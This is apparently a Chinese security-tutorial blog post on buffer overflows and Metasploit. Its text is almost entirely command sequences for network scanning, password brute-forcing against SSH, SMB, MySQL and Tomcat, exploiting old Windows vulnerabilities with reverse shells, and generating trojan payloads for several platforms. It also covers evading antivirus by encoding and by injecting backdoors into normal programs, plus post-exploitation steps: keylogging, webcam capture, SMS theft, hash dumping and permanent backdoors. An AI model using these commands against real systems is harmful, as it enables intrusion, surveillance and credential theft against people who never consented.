网络安全 (九 缓冲区溢出metasploit)
缓冲区溢出的含义是为缓冲区提供了多于其存储容量的数据,就像往杯子里倒入了过量的水一样。
缓冲区可以更抽象地理解为一段可读写的内存区域,
缓冲区攻击的最终目的就是希望系统能执行这块可读写内存中已经被蓄意设定好的恶意代码。
使用安全的字符串操作函数
编写安全代码
输入数据验证(过滤)
指针完整性检查
第三方软件防御
渗透攻击(exploit)
测试者利用系统、程序或服务的漏洞进行攻击的一个过程
攻击载荷(payload)
攻击者在目标系统上执行的一段攻击代码,改代码具有反弹连接,创建用户,执行其他系统命令的功能
shellcode
在目标机器上运行的一段机器指令,成功执行后会返回一个shell
模块(module)
是指metasploit框架中所使用的一段软件代码组件
监听器(listener)
监听器是metasploit中用来等待接入网络连接的组件
开启数据库service postgresql statr
查看数据库状态 service postgresql status
运行msfconsole
查看数据库连接状态 db_connect
创建一个工作台 workspace -a test
删除工作台 workspace - d test
进入test工作台 Wordspace test
使用nmap db_nmap -sS 192.168.80.1 扫描主机
导出扫描结果 db_export 1.xml
导入扫描结果 db_import 1.xml
查看扫描结果 hosts
信息收集
开启msfconsole
- whois www.example.com
- nslookup
use auxiliary/scanner/ip/ipidseq #IPID序列扫描器,与nmap的-sI -O选项类似
show options
set RHOSTS 192.168.1.0/24
set RPORT 8080
set THREADS 50
run
nmap连接数据库扫描
db_nmap -sS -A 192.168.2.123
db_services 查看扫描结果
使用portscan模块
search postscan
use auxiliary/scanner/postscan/syn
set RHOSTS 192.168.1.111
set THREADS 50
run
特定扫描 smb_version模块:
use auxiliary/scanner/smb/smb_version 查找开启445端口的ip
show options
set RHOSTS 192.168.1.111
set THREADS 50
run
db_hosts -c address,os_flavor
找mssql主机
use auxiliary/scanner/mssql/mssql_ping
show options
set RHOSTS 192.168.1.0/24
set THREADS 255
run
搜索网站中的e-mail地址
search_email_collector
use auxiliary/gather/search_email_collector
set DOMAIN cracer.com (扫描域名)
run
ssh服务器扫描
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.0/24
set THREADS 50
run
telnet服务
use auxiliary/scanner/telnet/telnet_version
set RHOSTS 192.168.1.0/24
set THREADS 50
run
ftp主机扫描
use auxiliary/scanner/ftp/ftp_version
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run
扫ftp匿名登陆
use auxiliary/scanner/ftp/anonymos
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run
ftp匿名登陆
登陆名称:anonymous
密码:空
扫描局域网中有哪些主机存活
use auxiliary/scanner/discovery/arp_sweep
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run
扫网站目录(并不会扫描文件)
use auxiliary/scanner/http/dir_scanner
show options
set RHOSTS 192.168.1.129
set THREADS 50
run
扫描SNMP主机
use auxiliary/scanner/snmp/snmp_login
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run
嗅探抓包
use auxiliary/sniffer/psnuffle
run
密码爆破
ssh密码
search ssh_login
use auxiliary/scanner/ssh/ssh_login
show options
set RHOSTS 192.168.2.231
set PASS_FILE pass
set USERNAME root
exploit
telnet密码
search telnet_login
use auxiliray/scanner/telnet/telnet_login
show options
set RHOSTS 192.168.2.123
set FILE_PATH pass
set USERNAME administrator
exploit
samba攻击
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.2.3
set PASS_FILE pass
set SMBUser administrator
set THREADS 50
exploit
mysql密码爆破
search mysql_login
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.1.32
set PASS_FILE pass
set USERNAME root
set THREADS 50
exploit
search postgresql_login
use auxiliary/scanner/postgres/postgres_login
show options
set RHOSTS 192.168.2.129
set PASS_FILE pass
set USERNAME postgres
exploit
tomcat攻击
search tomcat_mgr_login
show options
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 192.168.1.23
set PASS_FILE /root/pass.txt
set USER_FILE /root/user.txt
exploit
漏洞利用模块
show targets 显示目标(os版本)
set TARGET 设置目标版本
exploit 开始漏洞攻击
session -l 列出会话
session -i 选择会话
session -k 结束会话
z 把会话放到后台
c 结束会话
show auxiliary 显示辅助模块
use 使用辅助模块
set 设置选项
run 运行模块
ms10_002
search ms10_002
use exploit/windows/browser/ms10_002_aurora
show options
set SRVHOST 192.168.2.128 (生成恶意网址的IP(可以代理))
set payload windows/meterpreter/reverse_tcp (反弹shell)
set SRVPORT 80 (反弹回来的端口)
set URIPATH /
set LHOST 192.168.2.128 (用于监听的地址)
set LPORT 1211 (用于监听的端口)
exploit
sessions -i (查看是否存在会话)
sessions -i 1 (选择一个ID,进入会话)
直接输入shell 即可得到shell
ms10_018
search ms10_018
use exploit/windows/browser/ms10_018_ie_behaviors
show options
set SRVHOST 192.168.2.128
set SRVPORT 8081
set payload windows/shell/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1211
exploit
sessions -i (查看是否存在会话)
sessions -i 1 (选择一个ID,进入会话)
因为payload的不同,所以这个直接进入了shell
ms12_020
search ms12_020
use auxiliary/scanner/rdb/ms12_020_check (检查是否存在ms12_020漏洞)
show options
set RHOSTS 192.168.2.0/24
set THREADS 50
back
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
show options
set RHOST 192.168.2.132
run
ms10_046
search ms10_046
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
show options
set SRBHOST 192.168.2.128
set payload windows/shell/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1213
exploit
ms08_067
search ms08_067
use exploit/windows/smb/ms08_067_netapi
show options
set RHOST 192.168.2.131
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1215
show target
set target 34
exploit
shellcode
windows
生成shellcode
msfpaylaod windows/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/cracer.exe监听shellcode
msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (地址要一致)
set LPORT 1121将生成得shellcode上传到目标机上exploit
linux
生成shellcode
msfpayload linux/x86/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/cracer监听shellcode
msf
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (地址要一致)
set LPORT 1121将生成得shellcode上传到目标机上exploit
andriod
生成shellcode
msfpayload android/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/Desktop/cracer.apk监听shellcode
msf
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (地址要一致)
set LPORT 1121将生成得shellcode上传到目标机上exploitdump_contacts 导出电话
dump_sms 导出信息
Webcam_list 摄像头数目
-i 1 后置摄像头
webcam_snap 拍照
webcam_stream 开启摄像头
java
生成shellcode
msfpayload java/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1125 X > /root/Desktop/cracer.jar监听shellcode
msf
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (地址要一致)
set LPORT 1125将生成得shellcode上传到目标机上exploit将生成得cracer.jar运行起来:Java -jar cracer.jar运行起来
php
成shellcode
msfpayload php/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 R > cracer.php监听shellcode
msf
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (地址要一致)
set LPORT 1121将生成得shellcode上传到目标机上exploit
shell免杀免杀
使用多重编码免杀
msfpayload windows/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1211 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /root/cc.exe
加壳免杀
upx -5 cc.exe
veil免杀
shellter免杀工具
shellcode代码注入工具
在一些正常得工具中,注入一些后门,实现免杀
- 首先使用Metasploit生成 payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=1337 -e x86/shikata_ga_nai -i 43 -f raw -o fud.raw - 执行wine shellter.exe 用红酒瓶运行我们的shellter,
- 这里A代表自动模式,PE target 是我们准备进行免杀的exe预注入文件位置
- 这里我们输入L命令开始选择载荷,我们这里就使用meterpreter_reverse_tcp载荷,输入1
- 输入我们的反弹shell的位置,接着键入我们需要监听的本地端口,这里我就选择1355作为监听端口,回车直接生成
- 启动Metasploit监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
set lport 1355
exploit - 启动监听之后,把目录下的生成得文件放置 windows 电脑下运行即可主机上线
后渗透
1.生成一个木马
msfpaylaod windows/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/cracer.exe
2. 进行监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.133
set LPORT 1233
exploit
木马在目标机执行
- 操作命令
截屏 screenshot 会将生成得图片放到主文件夹
获取系统运行得平台 sysinfo
获取键盘记录
keyscan_start 开始
keyscan_dump 输出
keyscan_stop 结束
ps查看进程
migrate 1774切换进程 (在成功得入侵到目标机上第一件事就是要切换到稳定得进程,这样即便程序被关闭,也会进行控制)
run post/windows/capture/keylog_recorder 记录键盘记录
获取hash----hashdump
利用hash登陆
use exploit/windwows/smb/psexec
set payload windwos/metpreter/reverse_tcp
set LHOST 192.168.2.133
SET RHOST 192.168.2.131 (目标)
show options
set LPORT 1212
set SMBUser administrator 获取hash中都可以得到这些数值 smbuser smbpass
set SMBPass asdasdqwsda1313
show options
exploit
进程迁移 run post/windows/manage/migrate (自行切换到稳定进程)
run killav 关闭cmd.exe
查看目标机所有流量 run packetrecorder -i 1
提取系统信息 run scraper
持久控制PC机 (开机自启)
run persistence -X -i 50 -p 1121 -r 192.168.2.133 (往目标得注册表里写入某些数据)
msfcosole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 1121
set LHOST 192.168.2.133
exploit
session -u 2 升级shell变成meterpreter
永久控制服务器
msfpaylaod windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1127 X > /root/cracer.exe
生成得payload放到目标机上
msfcosole
use exploit/multi/handler
set payload windows/meterpreter/metsvc_bin_tcp
set LPORT 1121
set LHOST 192.168.2.133
exploit
运行payload
run metsvc -A //安装永久后门
重启后
msfcosole
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
set RHOST 192.168.2.132
set LPORT 31337 //固定得端口
exploit
网络安全 (九 缓冲区溢出metasploit)相关推荐
- 网络安全系列之三十五 缓冲区溢出
缓冲区溢出的大名可谓如雷贯耳,我们不必去探究缓冲区溢出的原理,只需知道他能做什么就可以了.如果能够成功地对远程计算机进行缓冲区溢出,那么就可以获得远程计算机的Shell,也就可以直接以管理员的身份在远 ...
- 网络安全——缓冲区溢出攻击
1.缓冲区溢出概述 什么是缓冲区?它是指程序运行期间,在内存中分配的一个连续的区域,用于保存包括字符数组在内的各种数据类型.所谓溢出,其实就是所填充的数据超出了原有的缓冲区边界,并非法占据了另一段内存 ...
- 绿盟科技网络安全威胁周报2017.01 请关注MatrixSSL堆缓冲区溢出漏洞CVE-2016-6890
绿盟科技发布了本周安全通告,周报编号NSFOCUS-16-39,绿盟科技漏洞库本周新增30条,其中高危9条.本次周报建议大家关注 MatrixSSL 堆缓冲区溢出漏洞 ,目前,此漏洞已经公布了一段时间 ...
- 【网络安全】brainpan-windows缓冲区溢出详解
简介 渗透测试 注意: 本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的.我将使用Kali Linux作为此次学习的攻击者机器.这里使用的技术仅用于学习教 ...
- 网络安全实验:CCProxy缓冲区溢出攻击
CCProxy缓冲区溢出实验 一.实验环境说明 溢出对象:CCProxy(一款代理服务器软件,支持FTP和Telnet) 调试工具:CDB.WinDbg.OllyDBG.IDA Pro etc 实验环 ...
- Kali linux 学习笔记(十九)缓冲区溢出——linux(crossfire) 2020.3.1
前言 上一篇在windows下用SLMail的漏洞实现缓冲区溢出 这次在Linux下用crossfire的漏洞实现缓冲区溢出 crossfire穿越火线 多人在线rpg游戏 1.9.0版本接受入站so ...
- 网络安全攻防之缓冲区溢出攻击
什么是缓冲区溢出? 缓冲区溢出是一种异常现象,当软件向缓冲区中写入数据使缓冲区容量溢出时,会导致相邻存储器位置被覆盖.换句话说,过量的信息被传递到没有足够空间的容器中,而这些信息最终会替换相邻容器中的 ...
- 缓冲区溢出漏洞攻击演示实验(CProxy 6.2缓冲区溢出漏洞)
实验内容: 分析缓冲区溢出漏洞,利用CCProxy 6.2的这个缓冲区溢出漏洞,利用ping命令向其发送一个长的字符串,溢出局部变量,覆盖RET的位置,从而实现程序跳转到自己想要让其执行的程序上去. ...
- 【安全牛学习笔记】缓冲区溢出
数据与代码边界不清,导致程序执行代码 脚本: #! /bin/bash echo $1 在终端中运行脚本,参数写:或|加上命令,会被系统执行 源码审计 逆向工程 对编译后的文件反汇编 模糊测试 安装 ...
- Windows 2000缓冲区溢出入门
前言 我在互联网上阅读过许多关于缓冲区溢出的文章.其中的绝大多数都是基于*NIX操作系统平台的.后来有幸拜读了ipxodi所著的<Windows系统下的堆栈溢出>(已刊登在绿盟网络安全月刊 ...
最新文章
- I/O流。简单利用File.copy
- mybaits七:select查询返回list集合
- Omi框架学习之旅 - 生命周期 及原理说明
- rxjs angular_Angular RxJS深度
- 支持多协议多服务的服务器设计和实现的步骤,基于多协议的人工影响天气接入服务器设计与实现...
- 【Java_基础】java中static与final关键字的区别
- 聊聊集成电路工程技术人员都有哪些?
- html设置桌面背景win7,怎么让电脑桌面背景动起来 win7设置动态背景桌面的方法...
- 微信小程序生成海报功能
- unicode 特殊字符表 特殊符号
- 联想计算机系统重装,联想笔记本电脑一键重装系统的方法
- 中国研制成功人工智能探地雷达 可为地下空间做“体检”
- 基于Stm32f103利用模拟iic驱动LM75A温度传感器
- 苹果应用分身_苹果微信双开,现在可以了。
- 机器学习预测结果评估展示_评估通用社区测试计划的性能并预测结果
- 前后端分离电商B2C模式之_后台_购物车
- python实现读取文件英文词频统计并写入到文件
- 互联网金融大事件,从泛亚到e租宝敲响的警示钟?
- python数字转换成中文大写
- Matlab—simulink—simscape学习指导
热门文章
- 山东省公安厅交通管理局异地容灾系统运维、综合应用平台复制库升级项目
- 基于spring boot的实验自动评分系统
- php将两张图片合并成一张,加上文字
- Leetcode 击碎气球的最大分数
- MySQL 创库 查库 等基本操作
- 《迅雷链精品课》第十四课:区块链共识算法前沿分析
- 多变量微积分笔记(2)——多元函数及其微分
- 物联网下的智慧停车 让智能化找到车位
- 13.MD5对用户密码进行加密
- phalapi可以依赖注入么_[2.11]-核心思想:DI依赖注入-让资源更可控 | PhalApi(π框架) - PHP轻量级开源接口框架 - 接口,从简单开始!...